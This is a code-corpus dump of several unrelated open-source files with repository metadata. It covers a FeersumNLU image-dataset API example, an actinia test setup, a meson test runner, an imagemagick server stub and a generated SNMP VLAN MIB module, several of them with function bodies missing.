    organism along the third axis). Returns an m x n x n_tasks grid where
    each entry holds the fraction of strings in that cell with a 1 in the
    corresponding digit position.
    """
    result = deepcopy(data)
    for i in range(len(data)):
        for j in range(len(data[0])):
            cell = data[i][j]
            totals = [0.0] * n_tasks
            for phenotype in cell:
                digits_start = phenotype.find("b") + 1
                for pos in range(digits_start, len(phenotype)):
                    # pos - 2 assumes the standard "0b" prefix, so digit
                    # position maps directly onto the task index.
                    totals[pos - 2] += int(phenotype[pos])
            result[i][j] = [t / len(cell) for t in totals]
    return result
| 36.993377 | 79 | 0.669083 |
775334a35368377b6411b76e0cda684325c797b3 | 119 | py | Python | Python/ComplexPaths02/src/main/MainModule01.py | tduoth/JsObjects | eb3e2a8b1f47d0da53c8b1a85a7949269711932f | [
"MIT"
] | 22 | 2015-02-26T09:07:18.000Z | 2020-05-10T16:22:05.000Z | Python/ComplexPaths02/src/main/MainModule01.py | tduoth/JsObjects | eb3e2a8b1f47d0da53c8b1a85a7949269711932f | [
"MIT"
] | 123 | 2016-04-05T18:32:41.000Z | 2022-03-13T21:09:21.000Z | Python/ComplexPaths02/src/main/MainModule01.py | tduoth/JsObjects | eb3e2a8b1f47d0da53c8b1a85a7949269711932f | [
"MIT"
] | 56 | 2015-03-19T22:26:37.000Z | 2021-12-06T02:52:02.000Z | '''
Created on May 26, 2012
@author: Charlie
''' | 13.222222 | 27 | 0.613445 |
7753e7fec1d5a58812ddcacb76ec8e3307a0b943 | 2,109 | py | Python | examples/image_dataset_create.py | praekelt/feersum-nlu-api-wrappers | 6580e2bab2c8a764fe868a505330b3fee6029074 | [
"BSD-3-Clause"
] | 9 | 2017-10-10T12:24:23.000Z | 2021-08-18T14:07:51.000Z | examples/image_dataset_create.py | praekelt/feersum-nlu-api-wrappers | 6580e2bab2c8a764fe868a505330b3fee6029074 | [
"BSD-3-Clause"
] | 1 | 2020-12-06T11:03:25.000Z | 2021-04-14T05:21:23.000Z | examples/image_dataset_create.py | praekelt/feersum-nlu-api-wrappers | 6580e2bab2c8a764fe868a505330b3fee6029074 | [
"BSD-3-Clause"
] | 2 | 2019-02-12T08:26:06.000Z | 2022-02-01T09:39:47.000Z | """ Example: Shows how to create and use an image dataset. """
import urllib3
import feersum_nlu
from feersum_nlu.rest import ApiException
from examples import feersumnlu_host, feersum_nlu_auth_token
# from feersum_nlu_util import image_utils
# Configure API key authorization: APIKeyHeader
configuration = feersum_nlu.Configuration()
# configuration.api_key['AUTH_TOKEN'] = feersum_nlu_auth_token
configuration.api_key['X-Auth-Token'] = feersum_nlu_auth_token  # Alternative auth key header!
configuration.host = feersumnlu_host
# API client for the image-dataset endpoints.
api_instance = feersum_nlu.ImageDatasetsApi(feersum_nlu.ApiClient(configuration))
instance_name = 'labelled_images_1'
# Details for the dataset to create; load_from_store=False means a fresh,
# empty dataset rather than one restored from persistent storage.
create_details = feersum_nlu.ImageDatasetCreateDetails(name=instance_name,
                                                       desc=instance_name,
                                                       load_from_store=False)
# NOTE(review): caller_name is defined but never passed to any call below.
caller_name = 'example_caller'
print()
try:
    print("Create the image dataset:")
    api_response = api_instance.image_dataset_create(create_details)
    print(" type(api_response)", type(api_response))
    print(" api_response", api_response)
    print()
    print("Get the details of specific named loaded image dataset:")
    api_response = api_instance.image_dataset_get_details(instance_name)
    print(" type(api_response)", type(api_response))
    print(" api_response", api_response)
    print()
    # print("Delete named loaded image dataset:")
    # api_response = api_instance.image_dataset_del(instance_name)
    # print(" type(api_response)", type(api_response))
    # print(" api_response", api_response)
    # print()
    #
    # print("Vaporise named loaded image dataset:")
    # api_response = api_instance.image_dataset_vaporise(instance_name)
    # print(" type(api_response)", type(api_response))
    # print(" api_response", api_response)
    # print()
except ApiException as e:
    print("Exception when calling a image dataset operation: %s\n" % e)
except urllib3.exceptions.HTTPError as e:
    print("Connection HTTPError! %s\n" % e)
| 35.745763 | 95 | 0.699384 |
775402adbd62e329a7b317ab8391c40e03b9d6e5 | 2,536 | py | Python | tests/test_resource_base.py | neteler/actinia_statistic_plugin | 428d191830bb59a8927fde68fd1e4439331fef97 | [
"MIT"
] | 3 | 2018-10-16T14:32:07.000Z | 2020-03-24T18:07:02.000Z | tests/test_resource_base.py | neteler/actinia_statistic_plugin | 428d191830bb59a8927fde68fd1e4439331fef97 | [
"MIT"
] | 7 | 2019-10-01T07:46:52.000Z | 2022-03-24T09:26:53.000Z | tests/test_resource_base.py | neteler/actinia_statistic_plugin | 428d191830bb59a8927fde68fd1e4439331fef97 | [
"MIT"
] | 4 | 2018-10-26T11:52:09.000Z | 2020-03-24T18:07:03.000Z | # -*- coding: utf-8 -*-
import atexit
import os
import signal
import time
from flask_restful import Api
from actinia_core.testsuite import ActiniaTestCaseBase, URL_PREFIX
from actinia_core.core.common.config import global_config
from actinia_core.core.common.app import flask_app, flask_api
from actinia_statistic_plugin.endpoints import create_endpoints
from actinia_core.endpoints import create_endpoints as create_actinia_endpoints
__license__ = "GPLv3"
__author__ = "Sren Gebbert"
__copyright__ = "Copyright 2016-2019, Sren Gebbert"
__maintainer__ = "Sren Gebbert"
__email__ = "soerengebbert@googlemail.com"
redis_pid = None
server_test = False
custom_actinia_cfg = False
create_actinia_endpoints()
create_endpoints(flask_api)
# If this environmental variable is set, then a real http request will be send
# instead of using the flask test_client.
if "ACTINIA_SERVER_TEST" in os.environ:
server_test = bool(os.environ["ACTINIA_SERVER_TEST"])
# Set this variable to use a actinia config file in a docker container
if "ACTINIA_CUSTOM_TEST_CFG" in os.environ:
custom_actinia_cfg = str(os.environ["ACTINIA_CUSTOM_TEST_CFG"])
# Register the redis stop function
atexit.register(stop_redis)
# Setup the environment
setup_environment()
| 32.512821 | 79 | 0.742902 |
7755642e2df8bfea6999683ed9d91b14f6530187 | 5,560 | py | Python | interpreter/code/tests/test_basic.py | yunkai123/my-500lines-notes | 60fd3b18919b5bcb90ddece9e088c1c152438972 | [
"MIT"
] | null | null | null | interpreter/code/tests/test_basic.py | yunkai123/my-500lines-notes | 60fd3b18919b5bcb90ddece9e088c1c152438972 | [
"MIT"
] | null | null | null | interpreter/code/tests/test_basic.py | yunkai123/my-500lines-notes | 60fd3b18919b5bcb90ddece9e088c1c152438972 | [
"MIT"
] | null | null | null | """ Byterund """
import vmtest | 25.62212 | 55 | 0.380935 |
7756950ec6fb5c1205ec5e03552facad7a4cc3ac | 387 | py | Python | core/recc/compile/future.py | bogonets/answer | 57f892a9841980bcbc35fa1e27521b34cd94bc25 | [
"MIT"
] | 3 | 2021-06-20T02:24:10.000Z | 2022-01-26T23:55:33.000Z | core/recc/compile/future.py | bogonets/answer | 57f892a9841980bcbc35fa1e27521b34cd94bc25 | [
"MIT"
] | null | null | null | core/recc/compile/future.py | bogonets/answer | 57f892a9841980bcbc35fa1e27521b34cd94bc25 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from importlib import import_module
| 27.642857 | 57 | 0.731266 |
77576a10d402216d2e59b9e687478fa26a161c83 | 10,503 | py | Python | genesis/objects/integrate.py | leifdenby/uclales-extractor | 6147533e25b3b417c744bd814d2407a6588cf995 | [
"BSD-3-Clause"
] | null | null | null | genesis/objects/integrate.py | leifdenby/uclales-extractor | 6147533e25b3b417c744bd814d2407a6588cf995 | [
"BSD-3-Clause"
] | null | null | null | genesis/objects/integrate.py | leifdenby/uclales-extractor | 6147533e25b3b417c744bd814d2407a6588cf995 | [
"BSD-3-Clause"
] | null | null | null | import os
import warnings
import xarray as xr
import numpy as np
# forget about using dask for now, dask_ndmeasure takes a huge amount of memory
# try:
# # raise ImportError
# # import dask_ndmeasure as ndimage
# # register a progressbar so we can see progress of dask'ed operations with xarray
# from dask.diagnostics import ProgressBar
# ProgressBar().register()
# except ImportError:
# from scipy import ndimage
# warnings.warn("Using standard serial scipy implementation instead of "
# "dask'ed dask-ndmeasure. Install `dask-ndmeasure` for much "
# "faster computation")
from scipy.constants import pi
from tqdm import tqdm
import dask_image.ndmeasure
from . import integral_properties
from . import minkowski_scales
from ..utils import find_grid_spacing
CHUNKS = 200 # forget about using dask for now, np.unique is too slow
FN_OUT_FORMAT = "{base_name}.objects.{objects_name}.integral.{name}.nc"
def integrate(objects, variable, operator=None, **kwargs):
"""
Integrate over the labelled objects in `objects` the variable (named by a
string, .e.g `r_equiv` would be the equivalent spherical radius). Can also
integrate for example a scalar field provided through an extra kwarg to
find for example the maximum value.
Available variables:
{avail_vars}
Calculating equivalent radius for each object:
>> integrate(da_objects, variable='r_equiv')
Calculate the maximum value of vertical velocity for each object
>> integrate(da_objects, variable='w', operator='maximum', w=da_w)
Calculate the volume integral of water vapour for each object
>> integrate(da_objects, variable='q', operator='volume_integral', q=ds.q)
"""
ds_out = None
if variable in objects.coords:
da_scalar = objects.coords[variable]
elif variable == "com_angles":
fn_int = integral_properties.calc_com_incline_and_orientation_angle
ds_out = _integrate_per_object(da_objects=objects, fn_int=fn_int)
elif hasattr(integral_properties, "calc_{}__dask".format(variable)):
fn_int = getattr(integral_properties, "calc_{}__dask".format(variable))
da_objects = objects
if "xt" in da_objects.dims:
da_objects = da_objects.rename(xt="x", yt="y", zt="z")
ds_out = fn_int(da_objects)
try:
ds_out.name = variable
except AttributeError:
# we can't actually set the name of a dataset, this only works with
# data arrays
pass
elif hasattr(integral_properties, "calc_{}".format(variable)):
fn_int = getattr(integral_properties, "calc_{}".format(variable))
ds_out = _integrate_per_object(da_objects=objects, fn_int=fn_int)
try:
ds_out.name = variable
except AttributeError:
# we can't actually set the name of a dataset, this only works with
# data arrays
pass
# XXX: volume is actually calculated by the minkowski routines which have
# been verified against those below (keeping in case I forget)
# elif variable == 'volume':
# dx = find_grid_spacing(objects)
# da_scalar = xr.DataArray(
# np.ones_like(objects, dtype=np.float),
# coords=objects.coords, attrs=dict(units='1')
# )
# da_scalar.name = 'volume'
elif variable in [
"length_m",
"width_m",
"thickness_m",
"genus_m",
"volume",
"num_cells",
"filamentarity",
"planarity",
]:
ds_minkowski = minkowski_scales.main(da_objects=objects)
ds_out = ds_minkowski[variable]
elif variable == "r_equiv":
da_volume = integrate(objects, "volume", operator="sum")
# V = 4/3 pi r^3 => r = (3/4 V/pi)**(1./3.)
da_scalar = (3.0 / (4.0 * pi) * da_volume) ** (1.0 / 3.0)
da_scalar.attrs["units"] = "m"
da_scalar.attrs["long_name"] = "equivalent sphere radius"
da_scalar.name = "r_equiv"
ds_out = da_scalar
elif variable in kwargs and operator in [
"volume_integral",
"maximum",
"maximum_pos_z",
"mean",
"sum",
]:
da_scalar = kwargs[variable].squeeze()
if not objects.zt.equals(da_scalar.zt):
warnings.warn(
"Objects span smaller range than scalar field to "
"reducing domain of scalar field"
)
da_scalar = da_scalar.sel(zt=objects.zt)
# ds_out = _integrate_scalar(objects=objects.squeeze(),
# da=da_scalar,
# operator=operator)
import ipdb
with ipdb.launch_ipdb_on_exception():
ds_out = _integrate_scalar(objects=objects, da=da_scalar, operator=operator)
else:
if operator:
raise NotImplementedError(
f"Don't know how to calculate `{operator}` of `{variable}` with fields"
f"{', '.join(kwargs.keys())}`"
)
else:
raise NotImplementedError(
"Don't know how to calculate `{}`" "".format(variable)
)
# else:
# fn_scalar = "{}.{}.nc".format(base_name, variable)
# if not os.path.exists(fn_scalar):
# raise Exception("Couldn't find scalar file `{}`".format(fn_scalar))
# da_scalar = xr.open_dataarray(
# fn_scalar, decode_times=False, chunks=CHUNKS
# ).squeeze()
if ds_out is None:
if objects.zt.max() < da_scalar.zt.max():
warnings.warn(
"Objects span smaller range than scalar field to "
"reducing domain of scalar field"
)
zt_ = da_scalar.zt.values
da_scalar = da_scalar.sel(zt=slice(None, zt_[25]))
ds_out = _integrate_scalar(objects=objects, da=da_scalar, operator=operator)
return ds_out
# hack to set docstring at runtime so we can include the available variables
integrate.__doc__ = integrate.__doc__.format(
avail_vars=", ".join(integral_properties.VAR_MAPPINGS.keys())
)
if __name__ == "__main__":
import argparse
argparser = argparse.ArgumentParser(__doc__)
argparser.add_argument("object_file")
argparser.add_argument("scalar_field")
argparser.add_argument("--operator", default="volume_integral", type=str)
args = argparser.parse_args()
object_file = args.object_file.replace(".nc", "")
op = args.operator
if "objects" not in object_file:
raise Exception()
base_name, objects_mask = object_file.split(".objects.")
fn_objects = "{}.nc".format(object_file)
if not os.path.exists(fn_objects):
raise Exception("Couldn't find objects file `{}`".format(fn_objects))
objects = xr.open_dataarray(fn_objects, decode_times=False, chunks=CHUNKS).squeeze()
name = make_name(
variable=args.scalar_field,
operator=op,
)
out_filename = FN_OUT_FORMAT.format(
base_name=base_name.replace("/", "__"), objects_name=objects.name, name=name
)
ds_out = integrate(
objects=objects, variable=args.scalar_field, operator=args.operator
)
import ipdb
with ipdb.launch_ipdb_on_exception():
ds_out.to_netcdf(out_filename)
print("Wrote output to `{}`".format(out_filename))
| 32.719626 | 88 | 0.63677 |
775775cc7a45c42108314eb9aa9a67d61fab3d99 | 181 | py | Python | current_console.py | jonasitzmann/ann-numpy | bb6d22667158687ca2d3de92abbeee0e129fa18e | [
"MIT"
] | null | null | null | current_console.py | jonasitzmann/ann-numpy | bb6d22667158687ca2d3de92abbeee0e129fa18e | [
"MIT"
] | null | null | null | current_console.py | jonasitzmann/ann-numpy | bb6d22667158687ca2d3de92abbeee0e129fa18e | [
"MIT"
] | null | null | null | from ann import *
x, y = utils.get_mnist_samples(100)
m = Model(x[0].shape)
m.add(Conv2D())
m.add(MaxPooling())
m.add(Flatten())
m.add(Dense(15))
m.add(Dense(10, a_func='sigmoid'))
| 20.111111 | 35 | 0.679558 |
77579ad9466e36640c85ebfa6cdc492815ea188c | 1,923 | py | Python | scripts/addon/generate_all.py | mozilla-releng/staging-mozilla-vpn-client | f31d3762a607ccf2d7c6a016f7b800305fbf0113 | [
"Apache-2.0"
] | null | null | null | scripts/addon/generate_all.py | mozilla-releng/staging-mozilla-vpn-client | f31d3762a607ccf2d7c6a016f7b800305fbf0113 | [
"Apache-2.0"
] | null | null | null | scripts/addon/generate_all.py | mozilla-releng/staging-mozilla-vpn-client | f31d3762a607ccf2d7c6a016f7b800305fbf0113 | [
"Apache-2.0"
] | null | null | null | #! /usr/bin/env python3
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import argparse
import hashlib
import json
import os
import subprocess
import sys
parser = argparse.ArgumentParser(description="Generate an addon package")
parser.add_argument(
"-q",
"--qt_path",
default=None,
dest="qtpath",
help="The QT binary path. If not set, we try to guess.",
)
args = parser.parse_args()
build_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "build.py")
addons_path = os.path.join(
os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))),
"addons",
)
generated_path = os.path.join(addons_path, "generated")
if not os.path.isdir(generated_path):
os.mkdir(generated_path)
generated_path = os.path.join(generated_path, "addons")
if not os.path.isdir(generated_path):
os.mkdir(generated_path)
addons = []
for file in os.listdir(addons_path):
addon_path = os.path.join(addons_path, file, "manifest.json")
if not os.path.exists(addon_path):
print(f"Ignoring path {file}.")
continue
build_cmd = [sys.executable, build_path, addon_path, generated_path]
if args.qtpath:
build_cmd.append("-q")
build_cmd.append(args.qtpath)
subprocess.call(build_cmd)
generated_addon_path = os.path.join(generated_path, file + ".rcc")
if not os.path.exists(generated_addon_path):
exit(f"Expected addon file {generated_addon_path}")
with open(generated_addon_path,"rb") as f:
sha256 = hashlib.sha256(f.read()).hexdigest();
addons.append({ 'id': file, 'sha256': sha256 })
index = {
'api_version': '0.1',
'addons': addons,
}
with open(os.path.join(generated_path, "manifest.json"), "w") as f:
f.write(json.dumps(index, indent=2))
| 30.046875 | 82 | 0.696828 |
7758e5a6fe24718f7edc88625d84b3904624aa2d | 8,310 | py | Python | meson_test.py | tp-m/meson | 2d1aa395e86848ca948d30d83cc5357777e5b490 | [
"Apache-2.0"
] | null | null | null | meson_test.py | tp-m/meson | 2d1aa395e86848ca948d30d83cc5357777e5b490 | [
"Apache-2.0"
] | null | null | null | meson_test.py | tp-m/meson | 2d1aa395e86848ca948d30d83cc5357777e5b490 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# Copyright 2013-2015 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys, os, subprocess, time, datetime, pickle, multiprocessing, json
import concurrent.futures as conc
import argparse
import mesonlib
tests_failed = []
parser = argparse.ArgumentParser()
parser.add_argument('--wrapper', default=None, dest='wrapper',
help='wrapper to run tests with (e.g. valgrind)')
parser.add_argument('--wd', default=None, dest='wd',
help='directory to cd into before running')
parser.add_argument('--suite', default=None, dest='suite',
help='Only run tests belonging to this suite.')
parser.add_argument('args', nargs='+')
if __name__ == '__main__':
sys.exit(run(sys.argv[1:]))
| 36.28821 | 97 | 0.601685 |
77592dd99f28334c1a356341edde3b576368b416 | 1,085 | py | Python | 2020/d05_1.py | PaulWichser/adventofcode | 628d962a65188310af136c8b88acbdbd5dc94352 | [
"MIT"
] | null | null | null | 2020/d05_1.py | PaulWichser/adventofcode | 628d962a65188310af136c8b88acbdbd5dc94352 | [
"MIT"
] | null | null | null | 2020/d05_1.py | PaulWichser/adventofcode | 628d962a65188310af136c8b88acbdbd5dc94352 | [
"MIT"
] | null | null | null | import fileimp
# divide rows 0-127
# F = lower half
# B = upper half
# divide columns 0-7
# R = upper half
# L = lower half
# seat ID = row * 8 + col
# list of IDs
# max list
testlist = fileimp.listimp("d05_test.txt")
if max(idcalc(testlist)) != 820:
print("Test Failed!")
quit()
seatlist = fileimp.listimp("d05_input.txt")
print("Largest seat ID = ", max(idcalc(seatlist)))
| 22.604167 | 60 | 0.453456 |
7759ab5bb6b2419c0cf09ba0f8c0454651c021e4 | 3,618 | py | Python | src/morphforge/simulation/neuron/core/neuronsimulationenvironment.py | mikehulluk/morphforge | 2a95096f144ed4ea487decb735ce66706357d3c7 | [
"BSD-2-Clause"
] | 1 | 2021-01-21T11:31:59.000Z | 2021-01-21T11:31:59.000Z | src/morphforge/simulation/neuron/core/neuronsimulationenvironment.py | mikehulluk/morphforge | 2a95096f144ed4ea487decb735ce66706357d3c7 | [
"BSD-2-Clause"
] | null | null | null | src/morphforge/simulation/neuron/core/neuronsimulationenvironment.py | mikehulluk/morphforge | 2a95096f144ed4ea487decb735ce66706357d3c7 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# Copyright (c) 2012 Michael Hull.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------
from morphforge.core import PluginDict
from morphforge.simulation.base import SimulationEnvironment
from morphforge.simulation.base import CurrentClampStepChange
from morphforge.simulation.base import VoltageClampStepChange
from morphforge.simulation.neuron.core import NEURONSimulationSettings
from morphforge.simulation.neuron.networks import NEURONGapJunction
from morphforge.simulation.neuron.core import NEURONCell
from morphforge.simulation.neuron.core import NEURONSimulation
| 37.6875 | 75 | 0.725263 |
775a75fe1fae66dbea733bd14ae845c43584999a | 766 | py | Python | news_topic_modeling_service/backfill.py | rishavgiri6/News4U | d426eba97039a3d1afd90ecd14c454856b91f9d8 | [
"Unlicense"
] | 2 | 2021-08-02T09:41:42.000Z | 2021-08-10T05:26:52.000Z | news_topic_modeling_service/backfill.py | rishavgiri6/News4U | d426eba97039a3d1afd90ecd14c454856b91f9d8 | [
"Unlicense"
] | null | null | null | news_topic_modeling_service/backfill.py | rishavgiri6/News4U | d426eba97039a3d1afd90ecd14c454856b91f9d8 | [
"Unlicense"
] | null | null | null | import os
import sys
# import common package in parent directory
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'common'))
import mongodb_client
import news_topic_modeling_service_client
if __name__ == '__main__':
db = mongodb_client.get_db()
cursor = db['news'].find({})
count = 0
for news in cursor:
count += 1
print(count)
if 'class' in news:
print('Populating classes...')
description = news['description']
if description is None:
description = news['title']
topic = news_topic_modeling_service_client.classify(description)
news['class'] = topic
db['news'].replace_one({'digest': news['digest']}, news, upsert=True)
| 30.64 | 81 | 0.620104 |
775cbe05f1e23d8b5ab980d33a068bbf4e214d9f | 2,559 | py | Python | server/imagemagick-server/server.py | brygga-dev/workdir2 | 0b6e8f54a3d44ef8dedefd1bdc95f193467d239e | [
"MIT"
] | null | null | null | server/imagemagick-server/server.py | brygga-dev/workdir2 | 0b6e8f54a3d44ef8dedefd1bdc95f193467d239e | [
"MIT"
] | null | null | null | server/imagemagick-server/server.py | brygga-dev/workdir2 | 0b6e8f54a3d44ef8dedefd1bdc95f193467d239e | [
"MIT"
] | null | null | null | from http.server import BaseHTTPRequestHandler,HTTPServer
from socketserver import ThreadingMixIn
import threading
import subprocess
import urllib.parse
# todo: factor out common server stuff
# todo: these should probably have limited
# access to files, so something like only
# uploads dir may be good.
# then there is slight problem about
# possibility to optimize theme files
# for example (which should be done first,
# but it'd be convenient to reuse this.)
# Maybe allow to mount a theme path
# Collecting args, stripping quotes string for
# it to work with subprocess.Popen
# Assuming only single quoted strings
if __name__ == '__main__':
print('Imagemagick server starts')
httpd = ThreadingSimpleServer(('0.0.0.0', 1345), Handler)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print('Imagemagick server stops')
| 30.831325 | 66 | 0.5932 |
775d1ff6bf052dcb5d8a678cb806eb618f0ebf92 | 26,692 | py | Python | pysnmp-with-texts/GENERIC-3COM-VLAN-MIB-1-0-7.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 8 | 2019-05-09T17:04:00.000Z | 2021-06-09T06:50:51.000Z | pysnmp-with-texts/GENERIC-3COM-VLAN-MIB-1-0-7.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 4 | 2019-05-31T16:42:59.000Z | 2020-01-31T21:57:17.000Z | pysnmp-with-texts/GENERIC-3COM-VLAN-MIB-1-0-7.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module GENERIC-3COM-VLAN-MIB-1-0-7 (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/GENERIC-3COM-VLAN-MIB-1-0-7
# Produced by pysmi-0.3.4 at Wed May 1 11:09:00 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsUnion, SingleValueConstraint, ValueRangeConstraint, ValueSizeConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "SingleValueConstraint", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsIntersection")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
NotificationType, Counter32, Integer32, ObjectIdentity, Counter64, IpAddress, MibIdentifier, iso, ModuleIdentity, Unsigned32, Gauge32, TimeTicks, MibScalar, MibTable, MibTableRow, MibTableColumn, Bits, enterprises = mibBuilder.importSymbols("SNMPv2-SMI", "NotificationType", "Counter32", "Integer32", "ObjectIdentity", "Counter64", "IpAddress", "MibIdentifier", "iso", "ModuleIdentity", "Unsigned32", "Gauge32", "TimeTicks", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Bits", "enterprises")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
a3Com = MibIdentifier((1, 3, 6, 1, 4, 1, 43))
generic = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 10))
genExperimental = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 10, 1))
genVirtual = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 10, 1, 14))
a3ComVlanGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1))
a3ComVlanProtocolsGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2))
a3ComVirtualGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 3))
a3ComEncapsulationGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 4))
a3ComVlanGlobalMappingTable = MibTable((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 1), )
if mibBuilder.loadTexts: a3ComVlanGlobalMappingTable.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanGlobalMappingTable.setDescription('This table lists VLAN interfaces that are globally identified. A single entry exists in this list for each VLAN interface in the system that is bound to a global identifier.')
a3ComVlanGlobalMappingEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 1, 1), ).setIndexNames((0, "GENERIC-3COM-VLAN-MIB-1-0-7", "a3ComVlanGlobalMappingIdentifier"))
if mibBuilder.loadTexts: a3ComVlanGlobalMappingEntry.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanGlobalMappingEntry.setDescription('An individual VLAN interface global mapping entry. Entries in this table are created by setting the a3ComVlanIfGlobalIdentifier object in the a3ComVlanIfTable to a non-zero value.')
a3ComVlanGlobalMappingIdentifier = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535)))
if mibBuilder.loadTexts: a3ComVlanGlobalMappingIdentifier.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanGlobalMappingIdentifier.setDescription('An index into the a3ComVlanGlobalMappingTable and an administratively assigned global VLAN identifier. The value of this object globally identifies the VLAN interface. For VLAN interfaces, on different network devices, which are part of the same globally identified VLAN, the value of this object will be the same.')
a3ComVlanGlobalMappingIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 1, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: a3ComVlanGlobalMappingIfIndex.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanGlobalMappingIfIndex.setDescription('The value of a3ComVlanIfIndex for the VLAN interface in the a3ComVlanIfTable, which is bound to the global identifier specified by this entry.')
a3ComVlanIfTable = MibTable((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2), )
if mibBuilder.loadTexts: a3ComVlanIfTable.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfTable.setDescription('This table lists VLAN interfaces that exist within a device. A single entry exists in this list for each VLAN interface in the system. A VLAN interface may be created, destroyed and/or mapped to a globally identified vlan.')
a3ComVlanIfEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1), ).setIndexNames((0, "GENERIC-3COM-VLAN-MIB-1-0-7", "a3ComVlanIfIndex"))
if mibBuilder.loadTexts: a3ComVlanIfEntry.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfEntry.setDescription('An individual VLAN interface entry. When an NMS wishes to create a new entry in this table, it must obtain a non-zero index from the a3ComNextAvailableVirtIfIndex object. Row creation in this table will fail if the chosen index value does not match the current value returned from the a3ComNextAvailableVirtIfIndex object.')
a3ComVlanIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1, 1), Integer32())
if mibBuilder.loadTexts: a3ComVlanIfIndex.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfIndex.setDescription("The index value of this row and the vlan's ifIndex in the ifTable. The NMS obtains the index value for this row by reading the a3ComNextAvailableVirtIfIndex object.")
